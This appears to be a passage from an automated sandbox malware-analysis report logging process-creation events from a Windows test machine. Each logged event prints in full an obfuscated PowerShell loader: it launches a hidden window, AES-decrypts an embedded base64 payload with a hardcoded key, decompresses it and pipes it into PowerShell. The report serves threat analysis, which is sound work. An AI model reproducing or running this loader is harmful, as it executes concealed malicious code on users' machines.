cAN701ZO7VAWJXn01F1knjEXcA2xIUy7yTx4X5XvY9Ic8B+WrFVnYAmeETknas0YjPJDNKgrU2ZZkDCY16AaXfB+4TVmx9EHFFSVRLFuBYUZ107thxonxzGWE8EmlGzrbg12z2s5IUOXVPZAnir8WfAYRjgTf6yXKoAZraJmEQE7yuzfMqfxYzhkWmNhTQMZ18ez3/USbDmLw4m30V1xHMW+m/GUovmPguRvO9df8eMs0NsZbVJyZ83z2tEL884DHKoIPAoPr86mPdCCW3TS3jYlZfSE2OZYrhhURmStTn4azcFWiW7vOpujNrW4WHXCwbHv65ol1pHmx7rmR0vNeK27chWrruid3JS/eoB0OoE5VVE4OIaCMi7bS0Ll5DcPbhKN/93elO8BNIhHN86dS7RLGnwyrnTHJfGh1TFpyANUEpFA+Aesef6m2wZEa6g1Qu6d67IoyStZaRB7bd1CgCrsTgfbMwJ9FIjXtYeRC2TJyxcHk9925PNj3F4Bc+A5Q4HY+SGZt3nG+2LklMKCR8IlQEcd2V//ObPJ/FWSLv5SPaQ+vQRP8t82R+O3/M2YH5sLSY6hXz22jZjhPOQ56PLx69brVCxFgFPIQruDzGCQunvzpBlp+cMMhxeZLip0CISOowibI+frniOn4VanN7nyQoiPBjKLUqKE1dGsJ8HTMMg8t7uElwm1Z8gOTkATSKAnYyK+pIZeBsbePIL4KtXj1S7dN5dSVlNhlzKsGbWPu9WdHoq1JrgD2DlT//iOdf0ILsfXJDJTlmDTADd0B2MvcrxoRNKCZMicJoznw3cWYeGUUOxqwvQZIxdnYrnGKqLt7JbSbGkfokf+ixbpQVDvzI2/cIYnJ7ZIfdwTbjuWmfBBB5tiu6t4dWXrPCuGgSsUXESsGRDhWNFTUTFLlkVfHbc4GX0TwPGvshqA8rQR6abELMA2e7ejEX+AtKSQW4dbQkTwJiLNL3uYMRKgmnHg3TIn86tYgBTuf9pnj/DIZNw2ZA6YnK3Sbxjb2Q3lz03Dtw63TMR39iBlnjroZakPQz4mggFrkN6am6DF9C0YDkAeO8GErbbZcvTLPkpvsc/vTvoNcS5OUI+kwS2Ix0N57sEf0acciB537tGSuwA/Nq95bH/UFSw1bz724Sj5s7dsQtlHiq5jnKg+G5xhs71YJUzy4Qnn76gpq11VlmxMi8ylQGjCr1Ahzi1ELO4pnarQElXZsqSIINv9nEzl5ulKp9Jbn+EtA85csbB5p7mJtACPWok9a9TpZs/ZwdNwU7oVbYga65enge4QUTldLr0KdjY/3gd186lbzNzuTqrgZXgSymli7tEN6vMTMN/YLCb1Art+uPcM0Pra/GO6yMv7V0GH01Vdbby915wN5EBgTF1qnR82oY5UKnnTov/l3pgIzLdC0lV9147qgHtHdUQPuXPPjPeGb9t2xcw0+NVEBNGg3ZSNkC71pRpm2W99nD71yMw53Lm0uiJHhcTQw9Hz7tASGMtI5R0Ey88DpK43nvQA==';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell -

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 25, 2023, 10:35 a.m.	thread_identifier: 1704 thread_handle: 0x00000000000004dc process_identifier: 756 current_directory: C:\Users\test22\Desktop filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell - } filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000004d4	1	1
ShellExecuteExW July 25, 2023, 10:35 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = 'AAAAAAAAAAAAAAAAAAAAAPQl+JCOzpJjaCc4oUUtzD6dtRc5GeY13jTOOYnEVEw9/oEcTlImTTjV3Mz44W6BrbCgvmdbny1MHoQC5+rcpv+sFoXHM3PSehbBHZ2q1IJ8xPaB0q0JwnompfbTkfMVDiE/FBejZH/5RWv3ppRUB09vvxJTAeAvQKDGkEmJ1Aq4HS12m8rPu3v1uQCmZjsP5h1Hi74RrBIpmS+jmJYQRYL+TmPLAAAcY25bybixxvOTLUEz4vf195zo9OIWRYfu8cp26Dqymqh9elUnx0NRTnthnPVmGBJwFO8hNON3RnEP3tQLztYBw/vRUbvTkS77TPkponxnwG05WbkA+88LvgR2OLo0HG+2r7fd7pHeru0vl/qyGl0NB8ajPlq0aCJk9QJosD+3GzT4ZpldSvlGdN3+0BGxyCZBgvHlSwuOEPNSiqdqvSnZq7KgCKU0pc++xhN6blRNhL5gXfOk5AP80Id4FXOuWU80HCGS5CryabRDgmZH/r883LoZIGy+BKgfpEedvCuodGLtTii2aAAHZJBoyD/AcYgYHnNfck2hlTMAFtLs+od+5ow9kEbqARNVXtxn+rFENJnPmhSUQLLwgnN+8deC9CNJaLmANKSMTGJOJ9Pdrm7Z7Dk1L444+v+DzqpXQ9WlAMAKiZMSN1bAVkVZQv/Gla8I7ytIwf58fdPHRJCUERgdJDeg6G2z+zT10r1VDmPSUQBYwUlGO6TWQV5DZIgcjwxzYIZseM79fqqzDr3vS0dbgcYEI6cV4Bbd+1o4B4faQRobFRqzqQEI2HlohIdVcypQuafcoGBSjtOVVsU5sjiSVs0NNmFF2n16b28SGn8C5Vwftpq7JPmOW1CgHR548O34tqf3u3kmWe5ib/gZn5LYb+ZMpmXBHsgHla9uz+lZccTaViTVx23aCl24mulhn7FM09HVESgJO39Ke+WbA+76YoBTNvVZ/Pk4SxygfSxYdUySs7i5xAE/Dj+iroOh3AX3pM0ZtlZV7UcTQZCujIZ9qd/20vXN0pPGUV4Rj9FdRlQa4g5dgTuF58aM45wC5PmWabHXyNnLGAw2MUpgY7o0mmsyIvvyP0Wt6/l0q9eggKINSY2rldzM/CJRszOTv71Lo6egfKV6KJhojjVOOZmY9Ymw6xemtKuOGg+4iLIgzn+Aa6rZGCq5H9WHAkYdsMsSD/2kxiYHO7Id7o6OW0zDrF6c98u0NMrEQeyaAq2fMA00vsue9OIRhZeOSLxo+ziBQwVeNikTfTDOA7Dv2Wtm6BIL8iLZYhUMt4U0vAF69o0WneUjGRcaSWDXkR3Z2kgXxG9oeQjlForA4hx94KQeq6ZCRkkpg4QwN/pjBqpKtiiXOHeqMYVK6F6pURLu+NRK6/ulgXe4xxbEWInDSLHk9025b7LP6fsAvbIy7+8xQSEI1152lYJMk2Jj2LSwfkEA+oLZg9TBKToetYY6EKWfAQAc2p8dQyrmXau7yvSiJjNQ6OEYCoZ2RzCPuZtCApolqhfgOPn5eLQAQGnusW4RoNIhDhjkvGcrewSHkoAoNHG5D+CDt6AMOXiNyJtj9JaA+4csInsmsVBBUisp6j7+8WPXjWmKDCJ7sGEB+a+IVE08brSYnTfX8O7ChyoCIBHhZklWUw9RflJ8gTZbuxHQzPF4RQyJkJhwSLBU3WOlSMsXLWxrnbEU7uZUPvpYfddR8+lMADP9K50l5Vh0a3Mo9vzR9cYjLBBOgpOxf8jB78ASWE9gLq2Ub40qjpnc3/D/KYsS44HUk6VaQAZXk5K5kAYuT4kNpPUAyZCSlWbgKMaRuIxkd8LuTPht8zYSt+6tXrc7ZHvX+vL50MsI8suCiXEvypm1VEYdvCIc1jw5ad7jkiC/pn9lRInSC/Y3wuzwh+MwXXbuNsylJLxiWtwNEk2tEmacofNZ6DQbhupSwMhcFWAsJEGCFQw3wJwyg+IGQBvBDoCiyhGLbEH+X0TddOSRtGEX5JWtW2Ez4cOtYxUE1r0mqtLXcfDuxwHFvM6aUFHRkXjWRvFUb9zx/dB7D+M/KPLPpavZSUU1LJqXx0j5pLApvp4zdW3UmWR+svsRf01mvQ3f8lgdCWnTjHJiwBDX07MazuPNjjLiNoGTbfcuN8xIc1zpDt/9j/67kZ2AMInF6HhkYOlcqw+cSi6KaMqxAdIEdufoqKGPuF9IgFRDATIn475aTFeZdbwF/VZJWWp5ejTrsb4qA7kSZnCmBeXTENgklcbMAsZc//FU7WolOGsTACF0OVvvvX51bN2gbZ3VafX/804aICkQylZrenIBNzFLYhUVOiSHZoEBnY12vt1v6edtHQlOqtLVRcNeLEIpDeSBjTF77fd9fEFI9hqbZygTH5ihLAsBpnsFyngXXyVlCO7MRzNs9PC2iqfww7hC/mV3tYhAjuYevpTp7b67oBPrgdEa36IlcaSE+nUlsir8Mq+wSx6LVnpdQHBQ4kF1xDSJaW5y0Eo3hBmM1J6AwcC5vAMMaNR6pd3RXQJRoVocn5ObUg6q+f2mNrapva3jeb5pIKk5GLyKHElULazWRlXaV02s2V0sGdUBaaM/67tD0VAoWMrNEnjL6ImfI2wuzKeLaxZE/GTuzks7um0jVxDu42c3mrvqGJn+KqiHOHYpah+0f7ZEN/+hj+PTzLUaC2mWVO9Wqzypls5w7UlvzN9bvQJRKWD4s5H9xjy19itsJwchp4WI4Z56oBqaBr75YDcEJuZ52OSZNdWCGATrgjaAYoFveWKoLYO+CVoe6ur/BjxIsVFkbihcMCz713ii0B4pPj+j9GwjuSYhMQPz3Gvjxe6t6kyJahYTh3MoJbLBpTmdWN4IUzXXyWmLBRXAJvN2/XPgzAkWL9GxxfjZd8iqgZVS32nKV8gvnhfVcf4zq3Hf7+OXM0t8Q7VojcuKgVZv0T9GezIQ7pGKBmh6j4LF2AQsyigPyvBWbhXVhTYXSPcAN701ZO7VAWJXn01F1knjEXcA2xIUy7yTx4X5XvY9Ic8B+WrFVnYAmeETknas0YjPJDNKgrU2ZZkDCY16AaXfB+4TVmx9EHFFSVRLFuBYUZ107thxonxzGWE8EmlGzrbg12z2s5IUOXVPZAnir8WfAYRjgTf6yXKoAZraJmEQE7yuzfMqfxYzhkWmNhTQMZ18ez3/USbDmLw4m30V1xHMW+m/GUovmPguRvO9df8eMs0NsZbVJyZ83z2tEL884DHKoIPAoPr86mPdCCW3TS3jYlZfSE2OZYrhhURmStTn4azcFWiW7vOpujNrW4WHXCwbHv65ol1pHmx7rmR0vNeK27chWrruid3JS/eoB0OoE5VVE4OIaCMi7bS0Ll5DcPbhKN/93elO8BNIhHN86dS7RLGnwyrnTHJfGh1TFpyANUEpFA+Aesef6m2wZEa6g1Qu6d67IoyStZaRB7bd1CgCrsTgfbMwJ9FIjXtYeRC2TJyxcHk9925PNj3F4Bc+A5Q4HY+SGZt3nG+2LklMKCR8IlQEcd2V//ObPJ/FWSLv5SPaQ+vQRP8t82R+O3/M2YH5sLSY6hXz22jZjhPOQ56PLx69brVCxFgFPIQruDzGCQunvzpBlp+cMMhxeZLip0CISOowibI+frniOn4VanN7nyQoiPBjKLUqKE1dGsJ8HTMMg8t7uElwm1Z8gOTkATSKAnYyK+pIZeBsbePIL4KtXj1S7dN5dSVlNhlzKsGbWPu9WdHoq1JrgD2DlT//iOdf0ILsfXJDJTlmDTADd0B2MvcrxoRNKCZMicJoznw3cWYeGUUOxqwvQZIxdnYrnGKqLt7JbSbGkfokf+ixbpQVDvzI2/cIYnJ7ZIfdwTbjuWmfBBB5tiu6t4dWXrPCuGgSsUXESsGRDhWNFTUTFLlkVfHbc4GX0TwPGvshqA8rQR6abELMA2e7ejEX+AtKSQW4dbQkTwJiLNL3uYMRKgmnHg3TIn86tYgBTuf9pnj/DIZNw2ZA6YnK3Sbxjb2Q3lz03Dtw63TMR39iBlnjroZakPQz4mggFrkN6am6DF9C0YDkAeO8GErbbZcvTLPkpvsc/vTvoNcS5OUI+kwS2Ix0N57sEf0acciB537tGSuwA/Nq95bH/UFSw1bz724Sj5s7dsQtlHiq5jnKg+G5xhs71YJUzy4Qnn76gpq11VlmxMi8ylQGjCr1Ahzi1ELO4pnarQElXZsqSIINv9nEzl5ulKp9Jbn+EtA85csbB5p7mJtACPWok9a9TpZs/ZwdNwU7oVbYga65enge4QUTldLr0KdjY/3gd186lbzNzuTqrgZXgSymli7tEN6vMTMN/YLCb1Art+uPcM0Pra/GO6yMv7V0GH01Vdbby915wN5EBgTF1qnR82oY5UKnnTov/l3pgIzLdC0lV9147qgHtHdUQPuXPPjPeGb9t2xcw0+NVEBNGg3ZSNkC71pRpm2W99nD71yMw53Lm0uiJHhcTQw9Hz7tASGMtI5R0Ey88DpK43nvQA==';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf \| powershell - } filepath: powershell.exe	1	1
ShellExecuteExW July 25, 2023, 10:36 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c powershell.exe $YmgBp = 'AAAAAAAAAAAAAAAAAAAAAPQl+JCOzpJjaCc4oUUtzD6dtRc5GeY13jTOOYnEVEw9/oEcTlImTTjV3Mz44W6BrbCgvmdbny1MHoQC5+rcpv+sFoXHM3PSehbBHZ2q1IJ8xPaB0q0JwnompfbTkfMVDiE/FBejZH/5RWv3ppRUB09vvxJTAeAvQKDGkEmJ1Aq4HS12m8rPu3v1uQCmZjsP5h1Hi74RrBIpmS+jmJYQRYL+TmPLAAAcY25bybixxvOTLUEz4vf195zo9OIWRYfu8cp26Dqymqh9elUnx0NRTnthnPVmGBJwFO8hNON3RnEP3tQLztYBw/vRUbvTkS77TPkponxnwG05WbkA+88LvgR2OLo0HG+2r7fd7pHeru0vl/qyGl0NB8ajPlq0aCJk9QJosD+3GzT4ZpldSvlGdN3+0BGxyCZBgvHlSwuOEPNSiqdqvSnZq7KgCKU0pc++xhN6blRNhL5gXfOk5AP80Id4FXOuWU80HCGS5CryabRDgmZH/r883LoZIGy+BKgfpEedvCuodGLtTii2aAAHZJBoyD/AcYgYHnNfck2hlTMAFtLs+od+5ow9kEbqARNVXtxn+rFENJnPmhSUQLLwgnN+8deC9CNJaLmANKSMTGJOJ9Pdrm7Z7Dk1L444+v+DzqpXQ9WlAMAKiZMSN1bAVkVZQv/Gla8I7ytIwf58fdPHRJCUERgdJDeg6G2z+zT10r1VDmPSUQBYwUlGO6TWQV5DZIgcjwxzYIZseM79fqqzDr3vS0dbgcYEI6cV4Bbd+1o4B4faQRobFRqzqQEI2HlohIdVcypQuafcoGBSjtOVVsU5sjiSVs0NNmFF2n16b28SGn8C5Vwftpq7JPmOW1CgHR548O34tqf3u3kmWe5ib/gZn5LYb+ZMpmXBHsgHla9uz+lZccTaViTVx23aCl24mulhn7FM09HVESgJO39Ke+WbA+76YoBTNvVZ/Pk4SxygfSxYdUySs7i5xAE/Dj+iroOh3AX3pM0ZtlZV7UcTQZCujIZ9qd/20vXN0pPGUV4Rj9FdRlQa4g5dgTuF58aM45wC5PmWabHXyNnLGAw2MUpgY7o0mmsyIvvyP0Wt6/l0q9eggKINSY2rldzM/CJRszOTv71Lo6egfKV6KJhojjVOOZmY9Ymw6xemtKuOGg+4iLIgzn+Aa6rZGCq5H9WHAkYdsMsSD/2kxiYHO7Id7o6OW0zDrF6c98u0NMrEQeyaAq2fMA00vsue9OIRhZeOSLxo+ziBQwVeNikTfTDOA7Dv2Wtm6BIL8iLZYhUMt4U0vAF69o0WneUjGRcaSWDXkR3Z2kgXxG9oeQjlForA4hx94KQeq6ZCRkkpg4QwN/pjBqpKtiiXOHeqMYVK6F6pURLu+NRK6/ulgXe4xxbEWInDSLHk9025b7LP6fsAvbIy7+8xQSEI1152lYJMk2Jj2LSwfkEA+oLZg9TBKToetYY6EKWfAQAc2p8dQyrmXau7yvSiJjNQ6OEYCoZ2RzCPuZtCApolqhfgOPn5eLQAQGnusW4RoNIhDhjkvGcrewSHkoAoNHG5D+CDt6AMOXiNyJtj9JaA+4csInsmsVBBUisp6j7+8WPXjWmKDCJ7sGEB+a+IVE08brSYnTfX8O7ChyoCIBHhZklWUw9RflJ8gTZbuxHQzPF4RQyJkJhwSLBU3WOlSMsXLWxrnbEU7uZUPvpYfddR8+lMADP9K50l5Vh0a3Mo9vzR9cYjLBBOgpOxf8jB78ASWE9gLq2Ub40qjpnc3/D/KYsS44HUk6VaQAZXk5K5kAYuT4kNpPUAyZCSlWbgKMaRuIxkd8LuTPht8zYSt+6tXrc7ZHvX+vL50MsI8suCiXEvypm1VEYdvCIc1jw5ad7jkiC/pn9lRInSC/Y3wuzwh+MwXXbuNsylJLxiWtwNEk2tEmacofNZ6DQbhupSwMhcFWAsJEGCFQw3wJwyg+IGQBvBDoCiyhGLbEH+X0TddOSRtGEX5JWtW2Ez4cOtYxUE1r0mqtLXcfDuxwHFvM6aUFHRkXjWRvFUb9zx/dB7D+M/KPLPpavZSUU1LJqXx0j5pLApvp4zdW3UmWR+svsRf01mvQ3f8lgdCWnTjHJiwBDX07MazuPNjjLiNoGTbfcuN8xIc1zpDt/9j/67kZ2AMInF6HhkYOlcqw+cSi6KaMqxAdIEdufoqKGPuF9IgFRDATIn475aTFeZdbwF/VZJWWp5ejTrsb4qA7kSZnCmBeXTENgklcbMAsZc//FU7WolOGsTACF0OVvvvX51bN2gbZ3VafX/804aICkQylZrenIBNzFLYhUVOiSHZoEBnY12vt1v6edtHQlOqtLVRcNeLEIpDeSBjTF77fd9fEFI9hqbZygTH5ihLAsBpnsFyngXXyVlCO7MRzNs9PC2iqfww7hC/mV3tYhAjuYevpTp7b67oBPrgdEa36IlcaSE+nUlsir8Mq+wSx6LVnpdQHBQ4kF1xDSJaW5y0Eo3hBmM1J6AwcC5vAMMaNR6pd3RXQJRoVocn5ObUg6q+f2mNrapva3jeb5pIKk5GLyKHElULazWRlXaV02s2V0sGdUBaaM/67tD0VAoWMrNEnjL6ImfI2wuzKeLaxZE/GTuzks7um0jVxDu42c3mrvqGJn+KqiHOHYpah+0f7ZEN/+hj+PTzLU